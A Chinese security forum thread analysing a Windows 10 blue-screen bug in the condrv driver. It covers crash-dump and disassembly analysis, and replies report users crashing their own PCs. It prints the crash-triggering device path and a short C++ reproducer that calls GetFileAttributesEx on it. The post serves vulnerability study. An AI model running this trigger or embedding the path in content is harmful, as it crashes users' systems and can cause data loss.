吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 37649|回复: 641
收起左侧

[系统底层] Win10 蓝屏Bug分析

    [复制链接]
BeneficialWeb 发表于 2021-1-19 11:03
本帖最后由 BeneficialWeb 于 2021-1-19 11:05 编辑

    最近Win10比较火的一个蓝屏bug,谷歌浏览器输入\\.\globalroot\device\condrv\kernelconnect,就会导致电脑输入出现如下图所示蓝屏。好奇心突发,于是尝试用ie浏览器,却不会触发蓝屏。到底为什么呢?开始分析
bsod.jpg

内核完整转储,然后Windbg分析一下

analyze2.jpg
      
   
可以看到在condrv驱动里的派遣函数CdpDispatchCleanup发生了空指针引用,而后触发了蓝屏。
analyze1.jpg

  
查看栈调用,发现谷歌浏览器调用了GetFileAttributesExW函数,然后转入ntdll,接着走进了内核,然后调用了condrv的派遣函数。
analyze.jpg
  
  
C:\Windows\System32\drivers\condrv.sys拖入IDA,查看函数,经过对应发现是走到如上图所示的代码,触发了蓝屏异常。
ida.png
   

接下来是动态调试google浏览器,在KERNELBASE.GetFileAttributesExW下断点。看看传了哪些参数。
x64.jpg

由此可以写代码复现了。rcx,rdx,r8三个参数。
[C++] 纯文本查看 复制代码
// BSOD.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//

#include <iostream>
#include <Windows.h>

int main()
{
    WCHAR fileName[] = L"\\\\.\\globalroot\\device\\condrv\\kernelconnect";
    WIN32_FILE_ATTRIBUTE_DATA data;
    GetFileAttributesEx(fileName, GetFileExInfoStandard, &data);
}




生成的exe已上传附件,分析完毕!








blue_screen_of_death.zip

41.23 KB, 下载次数: 1160, 下载积分: 吾爱币 -1 CB

免费评分

参与人数 212威望 +2 吾爱币 +289 热心值 +182 收起 理由
junwen + 1 + 1 我很赞同!
sohu-Scass + 1 用心讨论,共获提升!
xxd15040807923 + 1 我很赞同!
xzllsa + 1 热心回复!
tianbukongbai + 1 + 1 谢谢@Thanks!
TLH + 1 我很赞同!
榆树 + 1 + 1 学习了
hao62 + 1 用心讨论,共获提升!
cao25468 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
森海微光 + 1 + 1 我很赞同!
老道创 + 1 + 1 我很赞同!
aze1990 + 1 我很赞同!
Alexxxx + 1 + 1 我很赞同!
shs81898 + 1 + 1 用心讨论,共获提升!
yehuaguo + 1 我很赞同!
夜灯 + 1 谢谢@Thanks!
winsws6 + 1 + 1 我很赞同!试了一下,果然如此的
wwh0791 + 1 + 1 我很赞同!
weiye588 + 1 + 1 我很赞同!
haorenmo + 1 + 1 我很赞同!
大根君爱打牌 + 1 + 1 谢谢@Thanks!
pamilasi + 1 我很赞同!
jackeyzhao + 1 谢谢@Thanks!
梨留香 + 1 + 1 谢谢@Thanks!
努力加载中 + 1 + 1 谢谢@Thanks!
LFM + 1 热心回复!
wbanysys + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
第三世界 + 1 热心回复!
swz7852151 + 1 + 1 热心回复!
我亦是过客 + 1 我很赞同!
1989zh09 + 1 + 1 用心讨论,共获提升!
清影_ + 1 + 1 谢谢@Thanks!
露兜 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
CyanCloud + 1 + 1 我很赞同!
RobinMaas + 1 + 1 用心讨论,共获提升!
jason_new3315 + 1 用心讨论,共获提升!
mmqk + 1 + 1 谢谢@Thanks!
三笙三世 + 1 + 1 我很赞同!
邂逅惊宏 + 1 + 1 我很赞同!
zys6913 + 1 + 1 我很赞同!
开心熊猫741 + 1 + 1 我很赞同!
WGR + 1 + 1 谢谢@Thanks!
Krishnamurti + 1 + 1 我很赞同!
AmanoHina. + 1 我很赞同!
qiujunjian1 + 1 + 1 谢谢@Thanks!
KERNELKANG + 1 + 1 谢谢@Thanks!
chenx + 1 + 1 我很赞同!
18269055653 + 1 + 1 虽然看不懂,但是觉得很牛逼
没事路过 + 1 + 1 谢谢@Thanks!
叶隽 + 1 学习到了,谢谢
苏落 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
Nick_Z + 1 + 1 感谢您的宝贵建议,我们会努力争取做得更好!
zhanglyyy + 1 + 1 鼓励转贴优秀软件安全工具和文档!
xifanu + 1 + 1 我很赞同!
meditation + 1 我很赞同!
Forehawk + 1 + 1 热心回复!
四块五的妞 + 1 + 1 我很赞同!
黑默丁格 + 1 + 1 用心讨论,共获提升!
laokang + 1 我很赞同!
soyiC + 1 + 1 用心讨论,共获提升!
神游 + 1 + 1 用心讨论,共获提升!
haoduoyu + 1 + 1 我很赞同!
zxj109838 + 1 + 1 我很赞同
wuaipjie + 1 + 1 大佬好强
clarenceryj + 1 + 1 我很赞同!
lu_52pojie + 1 我很赞同!
GraPefruits + 1 谢谢@Thanks!
一品茶香 + 1 + 1 大佬牛逼!
zr2019 + 1 谢谢@Thanks!
z8844833 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
liu520817 + 1 + 1 用心讨论,共获提升!
fengbolee + 1 + 1 用心讨论,共获提升!
vfd0379 + 1 分析很有启发
程晨 + 1 + 1 我很赞同!
夜降临Forever + 1 + 1 鼓励转贴优秀软件安全工具和文档!
xiong_online + 1 + 1 用心讨论,共获提升!
2020021452pojie + 1 + 1 谢谢@Thanks!
rainbo56 + 1 + 1 我很赞同!
剑来…… + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
lelea + 1 我很赞同!
CC二哈 + 1 + 1 我很赞同!
人小鬼大666 + 1 我很赞同!
wo952512065 + 1 + 1 我很赞同!
LIEJIU + 1 + 1 谢谢@Thanks!
meibing + 1 我也手贱了,真的蓝屏了
抱歉、 + 1 用心讨论,共获提升!
beijihu999 + 1 谢谢@Thanks!
天境E + 1 + 1 用心讨论,共获提升!
gunxsword + 1 + 1 真是BUG10 试了一下,XP WIN7 都没事 BUG10一下就崩了!
link2333 + 1 + 1 我很赞同!
haowenpeng123 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
风声yoi + 1 热心回复!
okgjkk + 1 + 1 热心回复!
lalala17 + 1 + 1 谢谢@Thanks!
ITGR + 1 火狐也蓝屏
a10036pj + 1 我很赞同!
小黑啊123 + 1 + 1 热心回复!
透心凉的雪碧 + 1 谢谢@Thanks!
处女-大龙猫 + 1 + 1 用心讨论,共获提升!
Par + 1 谢谢@Thanks!

查看全部评分

本帖被以下淘专辑推荐:

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

Hmily 发表于 2021-1-20 12:13
BeneficialWeb可以进一步分析一下,找出可利用方法和防御方案。
x124573833 发表于 2021-1-19 11:11
伱微笑時很美 发表于 2021-1-19 11:15
woshicp 发表于 2021-1-19 12:16
又是一个病毒小技巧
tgguan 发表于 2021-1-19 11:23
来得早啊,估计一会附件就没了
letao 发表于 2021-1-19 11:09
真速度,我刚刚重启两次电脑!
h_x_y0571 发表于 2021-1-19 11:27
蓝屏了啊  来来来 我给你重装一下系统就好了
主要是有时候,找到了原因  也不太去解决。 但还是支持一下楼主
虾虾 发表于 2021-1-19 11:16
大佬牛皮
wj阿斗 发表于 2021-1-19 11:18
学习学习
虾虾 发表于 2021-1-19 11:19
我没有蓝屏,就是重启了
star0angel 发表于 2021-1-19 11:19
完全不懂  大神就是大神
充血的二弟 发表于 2021-1-19 11:19
大佬牛批,已经重启了
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-12-22 01:11

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表